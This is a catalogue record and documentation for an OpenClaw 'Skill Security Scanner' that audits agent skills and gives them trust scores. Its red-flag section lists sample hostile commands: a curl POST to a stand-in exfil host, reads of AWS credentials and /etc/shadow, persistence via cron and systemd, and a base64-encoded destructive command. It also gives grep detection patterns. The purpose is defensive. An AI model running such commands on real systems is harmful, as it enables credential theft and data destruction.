{
  "schemaVersion": "1.0",
  "item": {
    "slug": "skill-security-scanner",
    "name": "Skill Security Scanner",
    "source": "tencent",
    "type": "skill",
    "category": "安全合规",
    "sourceUrl": "https://clawhub.ai/Steffano198/skill-security-scanner",
    "canonicalUrl": "https://clawhub.ai/Steffano198/skill-security-scanner",
    "targetPlatform": "OpenClaw"
  },
  "install": {
    "downloadMode": "redirect",
    "downloadUrl": "/downloads/skill-security-scanner",
    "sourceDownloadUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=skill-security-scanner",
    "sourcePlatform": "tencent",
    "targetPlatform": "OpenClaw",
    "installMethod": "Manual import",
    "extraction": "Extract archive",
    "prerequisites": [
      "OpenClaw"
    ],
    "packageFormat": "ZIP package",
    "includedAssets": [
      "README.md",
      "SKILL.md",
      "examples/scan-output.md",
      "scripts/scan-skill.sh"
    ],
    "primaryDoc": "SKILL.md",
    "quickSetup": [
      "Download the package from Yavira.",
      "Extract the archive and review SKILL.md first.",
      "Import or place the package into your OpenClaw setup."
    ],
    "agentAssist": {
      "summary": "Hand the extracted package to your coding agent with a concrete install brief instead of figuring it out manually.",
      "steps": [
        "Download the package from Yavira.",
        "Extract it into a folder your agent can access.",
        "Paste one of the prompts below and point your agent at the extracted folder."
      ],
      "prompts": [
        {
          "label": "New install",
          "body": "I downloaded a skill package from Yavira. Read SKILL.md from the extracted folder and install it by following the included instructions. Then review README.md for any prerequisites, environment setup, or post-install checks. Tell me what you changed and call out any manual steps you could not complete."
        },
        {
          "label": "Upgrade existing",
          "body": "I downloaded an updated skill package from Yavira. Read SKILL.md from the extracted folder, compare it with my current installation, and upgrade it while preserving any custom configuration unless the package docs explicitly say otherwise. Then review README.md for any prerequisites, environment setup, or post-install checks. Summarize what changed and any follow-up checks I should run."
        }
      ]
    },
    "sourceHealth": {
      "source": "tencent",
      "status": "healthy",
      "reason": "direct_download_ok",
      "recommendedAction": "download",
      "checkedAt": "2026-04-23T16:43:11.935Z",
      "expiresAt": "2026-04-30T16:43:11.935Z",
      "httpStatus": 200,
      "finalUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=4claw-imageboard",
      "contentType": "application/zip",
      "probeMethod": "head",
      "details": {
        "probeUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=4claw-imageboard",
        "contentDisposition": "attachment; filename=\"4claw-imageboard-1.0.1.zip\"",
        "redirectLocation": null,
        "bodySnippet": null
      },
      "scope": "source",
      "summary": "Source download looks usable.",
      "detail": "Yavira can redirect you to the upstream package for this source.",
      "primaryActionLabel": "Download for OpenClaw",
      "primaryActionHref": "/downloads/skill-security-scanner"
    },
    "validation": {
      "installChecklist": [
        "Use the Yavira download entry.",
        "Review SKILL.md after the package is downloaded.",
        "Confirm the extracted package contains the expected setup assets."
      ],
      "postInstallChecks": [
        "Confirm the extracted package includes the expected docs or setup files.",
        "Validate the skill or prompts are available in your target agent workspace.",
        "Capture any manual follow-up steps the agent could not complete."
      ]
    },
    "downloadPageUrl": "https://openagent3.xyz/downloads/skill-security-scanner",
    "agentPageUrl": "https://openagent3.xyz/skills/skill-security-scanner/agent",
    "manifestUrl": "https://openagent3.xyz/skills/skill-security-scanner/agent.json",
    "briefUrl": "https://openagent3.xyz/skills/skill-security-scanner/agent.md"
  },
  "agentAssist": {
    "summary": "Hand the extracted package to your coding agent with a concrete install brief instead of figuring it out manually.",
    "steps": [
      "Download the package from Yavira.",
      "Extract it into a folder your agent can access.",
      "Paste one of the prompts below and point your agent at the extracted folder."
    ],
    "prompts": [
      {
        "label": "New install",
        "body": "I downloaded a skill package from Yavira. Read SKILL.md from the extracted folder and install it by following the included instructions. Then review README.md for any prerequisites, environment setup, or post-install checks. Tell me what you changed and call out any manual steps you could not complete."
      },
      {
        "label": "Upgrade existing",
        "body": "I downloaded an updated skill package from Yavira. Read SKILL.md from the extracted folder, compare it with my current installation, and upgrade it while preserving any custom configuration unless the package docs explicitly say otherwise. Then review README.md for any prerequisites, environment setup, or post-install checks. Summarize what changed and any follow-up checks I should run."
      }
    ]
  },
  "documentation": {
    "source": "clawhub",
    "primaryDoc": "SKILL.md",
    "sections": [
      {
        "title": "Skill Security Scanner",
        "body": "Scan OpenClaw skills for security issues, suspicious patterns, and give a trust score. Helps users make informed decisions about which skills to trust."
      },
      {
        "title": "When to Use",
        "body": "Before installing a new skill from ClawHub\nAuditing existing installed skills\nUser asks \"is this skill safe?\"\nAfter ClawHavoc type incidents (malicious skills in ecosystem)\nBefore running untrusted skills"
      },
      {
        "title": "Quick Reference",
        "body": "CommandPurposescan-skill <path>Scan a single skillscan-allScan all skills in workspacetrust-score <path>Get quick trust score (0-100)list-permissions <path>List all requested permissions"
      },
      {
        "title": "1. Check Metadata (Frontmatter)",
        "body": "Look for:\n\nbins - CLI tools skill needs\nenv - Environment variables (API keys, tokens)\nrequires.config - Required config settings\nrequires.bins - Binary dependencies\n\nRed flags:\n\nSkills requesting many bins without clear purpose\nEnv vars for sensitive services (AWS keys, database passwords)\nConfig requiring admin/elevated permissions"
      },
      {
        "title": "2. Analyze SKILL.md Content",
        "body": "Suspicious patterns to detect:\n\n# Network calls to unknown domains\ngrep -E \"(curl|wget|http|https).*\\.com\" SKILL.md\ngrep -E \"fetch\\(|axios\\(\" SKILL.md\n\n# File system access beyond declared scope\ngrep -E \"rm -rf|dd |mkfs\" SKILL.md\n\n# Credential access\ngrep -E \"password|secret|token|key\" SKILL.md\n\n# Execution of downloaded code\ngrep -E \"eval\\(|exec\\(|system\\(\" SKILL.md\n\n# Base64 encoded commands\ngrep -E \"base64|-enc|-encode\" SKILL.md"
      },
      {
        "title": "3. Trust Score Calculation",
        "body": "Score from 0-100 based on:\n\nFactorWeightCriteriaAuthor reputation20%Known author? Official OpenClaw skill?Permission scope30%Minimal bins/envs?Code patterns25%No suspicious commandsUpdate frequency15%Recently updated?Download count10%Popular = more scrutiny"
      },
      {
        "title": "4. Risk Levels",
        "body": "ScoreRiskAction80-100🟢 LowSafe to use60-79🟡 MediumReview before use40-59🟠 HighUse with caution0-39🔴 CriticalDon't use"
      },
      {
        "title": "Scan Result",
        "body": "🔍 Skill: <skill-name>\n━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n📊 Trust Score: <score>/100 (<risk-level>)\n\n📋 Permissions Requested:\n   • bins: curl, jq\n   • env: OPENWEATHER_API_KEY\n\n⚠️ Issues Found:\n   1. [MEDIUM] Requests network access but no clear purpose\n   2. [LOW] No recent updates (6+ months)\n\n✅ Positive Signs:\n   • Official OpenClaw skill\n   • Clear documentation"
      },
      {
        "title": "Trust Report",
        "body": "Generate a full report:\n\n## Security Analysis: <skill-name>\n\n### Score: <score>/100 (<risk-level>)\n\n### Permissions Analysis\n| Type | Requested | Risk |\n|------|-----------|------|\n| bins | curl, jq | Low |\n| env | API_KEY | Medium |\n\n### Code Pattern Analysis\n- ✅ No suspicious execution patterns\n- ✅ No credential access attempts  \n- ⚠️ 2 network calls to external domains\n\n### Recommendation\n<RECOMMENDATION>"
      },
      {
        "title": "High Risk Patterns",
        "body": "Network exfiltration\n# Example: sending data to unknown servers\n# curl -X POST https://SUSPICIOUS-DOMAIN/exfil\n# fetch(\"https://data-collector.DOMAIN\")\n\n\n\nCredential harvesting\n# Example: reading credentials\n# cat ~/.aws/credentials\n# grep \"password\" /etc/shadow\n\n\n\nPersistence mechanisms\n# Example: auto-start, cron, systemd\n# sudo crontab -l\n# systemctl enable\n\n\n\nObfuscated code\n# Example: base64 encoded commands\necho \"c3VkbyByb20gL3J0ZiAv\" | base64 -d"
      },
      {
        "title": "Medium Risk Patterns",
        "body": "Excessive permissions - More bins/envs than needed\nNo documentation - Unclear what skill does\nOutdated - No updates in 6+ months\nThird-party dependencies - Unknown npm/go packages"
      },
      {
        "title": "Green Flags",
        "body": "✅ Official OpenClaw skills (openclaw/skills)\n✅ Clear, specific permissions\n✅ Active maintenance (recent commits)\n✅ Open source with clear code\n✅ Known author with reputation"
      },
      {
        "title": "Before Installing New Skill",
        "body": "# 1. Get skill path (ClawHub or local)\n# 2. Run full scan\nscan-skill /path/to/skill\n\n# 3. Check trust score\ntrust-score /path/to/skill\n\n# 4. Review issues\n# 5. Decide: install / skip / investigate more"
      },
      {
        "title": "Regular Security Audit",
        "body": "# Weekly: scan all installed skills\nscan-all\n\n# Monthly: generate full report\n# Save to .learnings/ for documentation"
      },
      {
        "title": "Quick Trust Check",
        "body": "# For quick decision\ntrust-score <path>\n\n# If score < 60, do full scan\n# If score < 40, don't use"
      },
      {
        "title": "Integration with Other Skills",
        "body": "Works with self-improving-agent - Log security findings\nUse memory - Remember trust scores for known skills\nReport findings to user before risky operations"
      },
      {
        "title": "Best Practices",
        "body": "Always scan before installing untrusted skills\nDocument scan results in .learnings/\nShare findings with community (anonymized)\nUpdate trust scores when vulnerabilities found\nTrust but verify - Don't rely solely on automated scanning"
      },
      {
        "title": "Example 1: Scanning Before Install",
        "body": "User wants to install \"cool-new-skill\" from ClawHub:\n\n> scan-skill ./skills/cool-new-skill\n\n🔍 Scanning: cool-new-skill\n━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n📊 Trust Score: 72/100 (🟡 Medium)\n\n📋 Permissions:\n   • bins: none\n   • env: none\n\n⚠️ Issues:\n   • No recent updates (8 months)\n   • Unknown author\n\n✅ Positives:\n   • Clear documentation\n   • Minimal permissions\n\n💡 Recommendation: Safe to try, monitor usage"
      },
      {
        "title": "Example 2: Finding Malware",
        "body": "> scan-skill ./skills/suspicious-skill\n\n🔍 Scanning: suspicious-skill\n━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n📊 Trust Score: 23/100 (🔴 CRITICAL)\n\n📋 Permissions:\n   • bins: curl, base64\n   • env: API_KEY, SECRET_TOKEN\n\n🚨 CRITICAL ISSUES FOUND:\n   1. Network exfiltration pattern detected\n   2. Credential access attempt\n   3. Obfuscated commands (base64)\n\n💀 Recommendation: DO NOT USE - Potential malware"
      },
      {
        "title": "Example 3: Audit Report",
        "body": "> scan-all\n\n📋 Scanning all skills in ~/.openclaw/workspace/skills/\n━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n\n✅ github: 95/100 (safe)\n⚠️ todoist: 68/100 (review needed)\n✅ self-improving-agent: 92/100 (safe)\n🔴 unknown-skill: 34/100 (remove recommended)\n\n━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\nSummary: 2 safe, 1 review, 1 remove"
      },
      {
        "title": "Related",
        "body": "ClawHavoc incident (Feb 2026) - 341 malicious skills\nAgent Trust Hub - Third-party security tooling\nOpenClaw Security docs: docs.openclaw.ai/gateway/security"
      }
    ],
    "body": "Skill Security Scanner\n\nScan OpenClaw skills for security issues, suspicious patterns, and give a trust score. Helps users make informed decisions about which skills to trust.\n\nWhen to Use\nBefore installing a new skill from ClawHub\nAuditing existing installed skills\nUser asks \"is this skill safe?\"\nAfter ClawHavoc type incidents (malicious skills in ecosystem)\nBefore running untrusted skills\nQuick Reference\nCommand\tPurpose\nscan-skill <path>\tScan a single skill\nscan-all\tScan all skills in workspace\ntrust-score <path>\tGet quick trust score (0-100)\nlist-permissions <path>\tList all requested permissions\nScanning Strategy\n1. Check Metadata (Frontmatter)\n\nLook for:\n\nbins - CLI tools skill needs\nenv - Environment variables (API keys, tokens)\nrequires.config - Required config settings\nrequires.bins - Binary dependencies\n\nRed flags:\n\nSkills requesting many bins without clear purpose\nEnv vars for sensitive services (AWS keys, database passwords)\nConfig requiring admin/elevated permissions\n2. Analyze SKILL.md Content\n\nSuspicious patterns to detect:\n\n# Network calls to unknown domains\ngrep -E \"(curl|wget|http|https).*\\.com\" SKILL.md\ngrep -E \"fetch\\(|axios\\(\" SKILL.md\n\n# File system access beyond declared scope\ngrep -E \"rm -rf|dd |mkfs\" SKILL.md\n\n# Credential access\ngrep -E \"password|secret|token|key\" SKILL.md\n\n# Execution of downloaded code\ngrep -E \"eval\\(|exec\\(|system\\(\" SKILL.md\n\n# Base64 encoded commands\ngrep -E \"base64|-enc|-encode\" SKILL.md\n\n3. Trust Score Calculation\n\nScore from 0-100 based on:\n\nFactor\tWeight\tCriteria\nAuthor reputation\t20%\tKnown author? Official OpenClaw skill?\nPermission scope\t30%\tMinimal bins/envs?\nCode patterns\t25%\tNo suspicious commands\nUpdate frequency\t15%\tRecently updated?\nDownload count\t10%\tPopular = more scrutiny\n4. Risk Levels\nScore\tRisk\tAction\n80-100\t🟢 Low\tSafe to use\n60-79\t🟡 Medium\tReview before use\n40-59\t🟠 High\tUse with caution\n0-39\t🔴 Critical\tDon't use\nOutput Format\nScan Result\n🔍 Skill: <skill-name>\n━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n📊 Trust Score: <score>/100 (<risk-level>)\n\n📋 Permissions Requested:\n   • bins: curl, jq\n   • env: OPENWEATHER_API_KEY\n\n⚠️ Issues Found:\n   1. [MEDIUM] Requests network access but no clear purpose\n   2. [LOW] No recent updates (6+ months)\n\n✅ Positive Signs:\n   • Official OpenClaw skill\n   • Clear documentation\n\nTrust Report\n\nGenerate a full report:\n\n## Security Analysis: <skill-name>\n\n### Score: <score>/100 (<risk-level>)\n\n### Permissions Analysis\n| Type | Requested | Risk |\n|------|-----------|------|\n| bins | curl, jq | Low |\n| env | API_KEY | Medium |\n\n### Code Pattern Analysis\n- ✅ No suspicious execution patterns\n- ✅ No credential access attempts  \n- ⚠️ 2 network calls to external domains\n\n### Recommendation\n<RECOMMENDATION>\n\nCommon Red Flags\nHigh Risk Patterns\n\nNetwork exfiltration\n\n# Example: sending data to unknown servers\n# curl -X POST https://SUSPICIOUS-DOMAIN/exfil\n# fetch(\"https://data-collector.DOMAIN\")\n\n\nCredential harvesting\n\n# Example: reading credentials\n# cat ~/.aws/credentials\n# grep \"password\" /etc/shadow\n\n\nPersistence mechanisms\n\n# Example: auto-start, cron, systemd\n# sudo crontab -l\n# systemctl enable\n\n\nObfuscated code\n\n# Example: base64 encoded commands\necho \"c3VkbyByb20gL3J0ZiAv\" | base64 -d\n\nMedium Risk Patterns\nExcessive permissions - More bins/envs than needed\nNo documentation - Unclear what skill does\nOutdated - No updates in 6+ months\nThird-party dependencies - Unknown npm/go packages\nGreen Flags\n✅ Official OpenClaw skills (openclaw/skills)\n✅ Clear, specific permissions\n✅ Active maintenance (recent commits)\n✅ Open source with clear code\n✅ Known author with reputation\nWorkflows\nBefore Installing New Skill\n# 1. Get skill path (ClawHub or local)\n# 2. Run full scan\nscan-skill /path/to/skill\n\n# 3. Check trust score\ntrust-score /path/to/skill\n\n# 4. Review issues\n# 5. Decide: install / skip / investigate more\n\nRegular Security Audit\n# Weekly: scan all installed skills\nscan-all\n\n# Monthly: generate full report\n# Save to .learnings/ for documentation\n\nQuick Trust Check\n# For quick decision\ntrust-score <path>\n\n# If score < 60, do full scan\n# If score < 40, don't use\n\nIntegration with Other Skills\nWorks with self-improving-agent - Log security findings\nUse memory - Remember trust scores for known skills\nReport findings to user before risky operations\nBest Practices\nAlways scan before installing untrusted skills\nDocument scan results in .learnings/\nShare findings with community (anonymized)\nUpdate trust scores when vulnerabilities found\nTrust but verify - Don't rely solely on automated scanning\nExamples\nExample 1: Scanning Before Install\n\nUser wants to install \"cool-new-skill\" from ClawHub:\n\n> scan-skill ./skills/cool-new-skill\n\n🔍 Scanning: cool-new-skill\n━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n📊 Trust Score: 72/100 (🟡 Medium)\n\n📋 Permissions:\n   • bins: none\n   • env: none\n\n⚠️ Issues:\n   • No recent updates (8 months)\n   • Unknown author\n\n✅ Positives:\n   • Clear documentation\n   • Minimal permissions\n\n💡 Recommendation: Safe to try, monitor usage\n\nExample 2: Finding Malware\n> scan-skill ./skills/suspicious-skill\n\n🔍 Scanning: suspicious-skill\n━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n📊 Trust Score: 23/100 (🔴 CRITICAL)\n\n📋 Permissions:\n   • bins: curl, base64\n   • env: API_KEY, SECRET_TOKEN\n\n🚨 CRITICAL ISSUES FOUND:\n   1. Network exfiltration pattern detected\n   2. Credential access attempt\n   3. Obfuscated commands (base64)\n\n💀 Recommendation: DO NOT USE - Potential malware\n\nExample 3: Audit Report\n> scan-all\n\n📋 Scanning all skills in ~/.openclaw/workspace/skills/\n━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n\n✅ github: 95/100 (safe)\n⚠️ todoist: 68/100 (review needed)\n✅ self-improving-agent: 92/100 (safe)\n🔴 unknown-skill: 34/100 (remove recommended)\n\n━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\nSummary: 2 safe, 1 review, 1 remove\n\nRelated\nClawHavoc incident (Feb 2026) - 341 malicious skills\nAgent Trust Hub - Third-party security tooling\nOpenClaw Security docs: docs.openclaw.ai/gateway/security"
  },
  "trust": {
    "sourceLabel": "tencent",
    "provenanceUrl": "https://clawhub.ai/Steffano198/skill-security-scanner",
    "publisherUrl": "https://clawhub.ai/Steffano198/skill-security-scanner",
    "owner": "Steffano198",
    "version": "1.0.1",
    "license": null,
    "verificationStatus": "Indexed source record"
  },
  "links": {
    "detailUrl": "https://openagent3.xyz/skills/skill-security-scanner",
    "downloadUrl": "https://openagent3.xyz/downloads/skill-security-scanner",
    "agentUrl": "https://openagent3.xyz/skills/skill-security-scanner/agent",
    "manifestUrl": "https://openagent3.xyz/skills/skill-security-scanner/agent.json",
    "briefUrl": "https://openagent3.xyz/skills/skill-security-scanner/agent.md"
  }
}